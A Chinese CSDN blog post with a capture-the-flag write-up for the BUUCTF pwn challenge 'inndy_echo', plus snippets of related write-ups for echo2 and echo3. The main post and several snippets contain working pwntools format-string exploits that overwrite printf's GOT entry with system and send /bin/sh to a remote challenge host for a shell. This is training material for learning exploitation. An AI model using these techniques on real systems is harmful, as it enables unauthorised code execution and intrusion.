inndy_echo

最新推荐文章于 2024-07-12 16:08:50 发布
最新推荐文章于 2024-07-12 16:08:50 发布
阅读量108 收藏
点赞数
分类专栏: Buuoj刷题 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_62887641/article/details/133429297
版权

inndy_echo

Arch:     i386-32-little
RELRO:    Partial RELRO
Stack:    No canary found
NX:       NX enabled
PIE:      No PIE (0x8048000)

32位,只开了NX

int __cdecl __noreturn main(int argc, const char **argv, const char **envp)
{
  char s; // [esp+Ch] [ebp-10Ch]
  unsigned int v4; // [esp+10Ch] [ebp-Ch]

  v4 = __readgsdword(0x14u);
  setvbuf(stdin, 0, 2, 0);
  setvbuf(stdout, 0, 2, 0);
  do
  {
    fgets(&s, 0x100, stdin);
    printf(&s);
  }
  while ( strcmp(&s, "exit\n") );
  system("echo Goodbye");
  exit(0);
}

程序很简单,给了格式化字符串漏洞,并且给了system

思路

printf@got-->system 输入/bin/sh

from pwn import*
from Yapack import *
r,elf=rec("node4.buuoj.cn",25120,"./pwn",10)
context(os='linux', arch='i386',log_level='debug')
#debug('b *0x80485b9')

pl=fmtstr_payload(7,{elf.got['printf']:elf.sym['system']})
sl(pl)
sl(b'/bin/sh\x00')
ia(c)

在这里插入图片描述

YameMres
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
uart_echo.rar_Echo Echo_amr
09-14
标题中的"uart_echo.rar_Echo Echo_amr"表明这是一个与UART(通用异步收发传输器)相关的项目,特别地,它是一个针对AMR(Adaptive Multi-Rate,一种音频编码标准)处理的示例,可能涉及到语音回声消除功能。...
uart_echo.rar_Echo Echo
09-23
"Echo Echo"项目显然涉及到通过UART接口实现数据的回显功能,即设备接收到的数据会被原样返回。这个过程有助于调试通信链路,确保数据正确传输。 在UART通信中,数据通常以字节流的形式发送,每字节包含8位数据,...
[BUUCTF-pwn]——inndy_echo
Y_peak的博客
03-29 515
[BUUCTF-pwn]——inndy_echo 有gets函数但是没有办法栈溢出,不过幸好有格式化字符串漏洞。 从旁边我们可以找到system的plt以及printf的got表, 将system的plt地址写入printf的got表。然后输入"/bin/sh"就可以了。 先找找偏移 7 exploit from pwn import * p = remote("node3.buuoj.cn",28268) #p = process("./echo") #gdb.attach(p, "b printf
inndy_echo2
z1r0的博客
03-25 657
inndy_echo2 查看保护 64位下的格式化漏洞,泄露出基址,再泄露出libc。改exit为one_gadget,exit退出就会getshell。 pwndbg运行至printf这里看一下stack就可以发现41和43可以拿到两个地址,再算出one_gadget。这里笔者进行格式化漏洞攻击的时候选定的是ljust(16, b'\x00') + exit_addr。exit_addr。刚好exit_addr放在了偏移为8。分开写,两个字节两个字节写。 from pwn import * from
[BUUCTF-pwn] inndy_echo3
weixin_52640415的博客
12-07 252
格式化字符串漏洞,这个题整了一会感觉很烦,然后搜了LiuLian 大师傅的exp [Hackme.inndy]echo/echo2/echo3 | LiuLian 感觉还是自己干吧。 程序没开pie这给泄露减轻不少负担,但这个题在main里先用随机数申请内存,然后在hardfmt里给esp赋值,这导致每次运行栈地址并不完全固定。 不固定其实是相对的,在hardfmt里它是不固定的,但是再往前main和libc_start_main_ret这些都是固定的,只要找到ebp再往后就固定了。 int _..
tcp_echo.rar_tcp_echo
09-19
本文将深入解析标题为“tcp_echo.rar_tcp_echo”的压缩包文件,它包含两个源代码文件:echoserver.c 和 echoclient.c,用于实现TCP协议下的回显服务器和客户端。 1. **TCP Echo服务** TCP Echo是一个简单的网络...
ecan.rar_Echo Echo_MATLAB eCan_echo_echo cancellation_echo canc
09-24
标题中的"ecan.rar_Echo Echo_MATLAB eCan_echo_echo cancellation_echo canc"表明这是一个与MATLAB相关的项目,主要目标是实现回声消除(Echo Cancellation)技术。在语音通信、音频处理或者网络会议等场景中,回声...
uart_echo.zip_Echo Echo_lm3s8962_uart_echo
09-23
标题 "uart_echo.zip_Echo Echo_lm3s8962_uart_echo" 提示我们这是一个与UART(通用异步收发传输器)相关的项目,特别是针对LM3S8962微控制器的Echo回显功能。在嵌入式系统中,UART是一种常用的串行通信接口,用于...
[BUUCTF]PWN——inndy_echo2(PIE+64位fmt)
mcmuyanga的博客
02-01 1489
inndy_echo2 附件 步骤 例行检查,64位程序,开启了nx和pie 本地试运行一下,看看大概的情况,猜测跟echo差不多。 64位ida载入,跟32位echo一样的代码,只是多开了一个PIE 64位的格式化字符串漏洞,它跟32位有挺大区别的,要注意‘00’的截断,不可以像32位那样一步修改到位,它一次只可修改2字节。不清楚的先看这篇文章 首先对于PIE,我们要先想办法泄露程序基址 在执行echo函数时,echo的栈帧的上一个元素存储了函数的返回地址,返回到main中,所以栈中必定有返回地址
[BUUCTF]-PWN:inndy_echo解析(32位格式化字符串漏洞)
2301_79326813的博客
02-06 720
查看保护查看ida有格式化字符串漏洞,可以修改printf的got表内地址为system,传参getshell。
BUUCYF之“inndy_echo”接单记录
Probeginner的博客
12-16 1644
32位fmt_payload修改got表
hackme inndy pwn echo2 writeup
charlie_heng的专栏
12-30 849
这题做了好久。。。但是学到了很多很骚的思路 做完echo1 ,然后看了下echo2,本来以为只是简单的从32位变成64位,但是发现坑贼多。。。。 首先,用checksec看了下,发现开了pie。。。那就不能简单的改got表,还要用格式化字符串漏洞来泄漏出一个指向程序本身的指针 第二,因为是64位系统,所以一个地址是8个字节,但是这里实际只有6个字节是有内容的,有两个字节是00,所以就不能用p...
echo和echo2的wp
一个码农的笔记
11-12 5659
https://hackme.inndy.tw/scoreboard/ 题目很有趣,我做了rop和rop2这两个题目感觉还不错,我把wp分享出来,方便大家学习 echo的要求是 nc hackme.inndy.tw 7711 Tips: format string vulnerability这个题目提示了是格式化字符串漏洞,所以先了解一下啥是格式化漏洞,参考 http://www.freeb
[BUUCTF]PWN——inndy_echo(32位fmt修改got表)
mcmuyanga的博客
02-01 832
inndy_echo 附件 步骤 例行检查,32位程序,开启了nx保护 本地试运行一下,看看大概的情况,已经看到存在格式化字符串漏洞了,而且还是可以一直输入的哪种 32位ida载入 看到程序里存在格式化字符串漏洞,而且有system函数,想到的是将printf@got修改为system@plt,由于一开始system没用执行,所以got表里的地址不对,得用plt表里的。然后传入bin/sh即可 pwntools集成了一个很强的工具,我们可以通过它快速修改对应的值, 命令格式: fmts
BUUCTF(pwn)inndy_echo(32位格式化字符串修改got表)
半岛铁盒的博客
04-05 403
这道题为我们提供了 system, 和 循环 过程, 为我们简化了很多步骤 from pwn import* p=remote('node3.buuoj.cn',25331) elf=ELF('./echo') printf_got=elf.got['printf'] sys=0x8048400 payload=fmtstr_payload(7,{printf_got:sys}) p.sendline(payload) p.sendline('bin/sh') p.interactive() 对...
DNSSec:网络安全的守护者
jiamisoft的博客
07-12 266
DNSSec是一种安全协议,它为DNS查询和响应过程提供了额外的加密层。通过使用公钥基础设施(PKI)和数字签名,DNSSec能够验证DNS响应的真实性,从而防止DNS欺骗攻击,即攻击者将用户重定向到恶意网站的行为。
医疗健康信息的安全挑战与隐私保护最佳实践
最新发布
2301_79955948的博客
07-12 548
随着医疗信息化的发展,医疗健康数据呈现出爆炸式的增长,医院信息系统、电子病历、健康管理等产生了海量的数据,这些数据的管理和保护成为了巨大的挑战。最新的研究和政策动态显示,国家卫生健康委员会等政府部门正在积极推动医疗健康信息安全管理规范的制定和实施,以加强数据安全和个人健康医疗数据相关的隐私保护。隐私保护的最佳实践包括建立完善的数据安全管理制度、规范医疗健康数据的收集、存储和传输过程,防止数据泄露。这些要求和措施有助于确保医疗健康信息的安全性和个人隐私的保护,减少信息泄露的风险,并促进医疗行业的健康发展。
module vlg_echo( input i_clk, input i_rst_n, input i_clk_en, input i_echo, output reg[15:0] o_t_us ); reg[1:0] r_echo; wire pos_echo,neg_echo; reg r_cnt_en; reg[15:0] r_echo_cnt; //对i_echo信号同步处理,获取边沿检测信号,产生计数使能信号r_cnt_en always @(posedge i_clk) if(!i_rst_n) r_echo<= 'b0; else r_echo <= {r_echo[0],i_echo}; assign pos_echo =r_echo[0] & ~r_echo[1] ; assign neg_echo = ~r_echo[0] &r_echo[1] ; always @(posedge i_clk) if(!i_rst_n) r_cnt_en <= 'b0; else if(pos_echo) r_cnt_en <= 'b1; else if(neg_echo) r_cnt_en <= 'b0; else ; //对i_echo信号高脉冲计时,以us为单位 always @(posedge i_clk) if(!i_rst_n) r_echo_cnt <= 'b0; else if(!r_cnt_en) r_echo_cnt <= 'b0; else if(i_clk_en) r_echo_cnt <= r_echo_cnt+1; else ; //对r_echo_cnt计数最大值做锁存 always @(posedge i_clk) if(!i_rst_n) o_t_us <= 'b0; else if(neg_echo) o_t_us <= r_echo_cnt; endmodule
06-08
这是一个 Verilog HDL 代码的例子,它包含一个名为 vlg_echo 的模块,其中包括一个输入端口 i_echo,一个时钟信号 i_clk,一个复位信号 i_rst_n,一个时钟使能信号 i_clk_en 和一个输出端口 o_t_us。在模块中定义了一些寄存器和线路,包括 r_echo、r_cnt_en、r_echo_cnt、pos_echo 和 neg_echo。 在模块中使用 always 块对 i_echo 信号进行同步处理,获取边沿检测信号,并产生计数使能信号 r_cnt_en。使用 assign 语句计算 pos_echo 和 neg_echo。另外,使用 always 块对 i_echo 信号高脉冲计时,以微秒为单位,最后使用 always 块对 r_echo_cnt 计数最大值进行锁存,并将锁存后的值赋值给 o_t_us。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值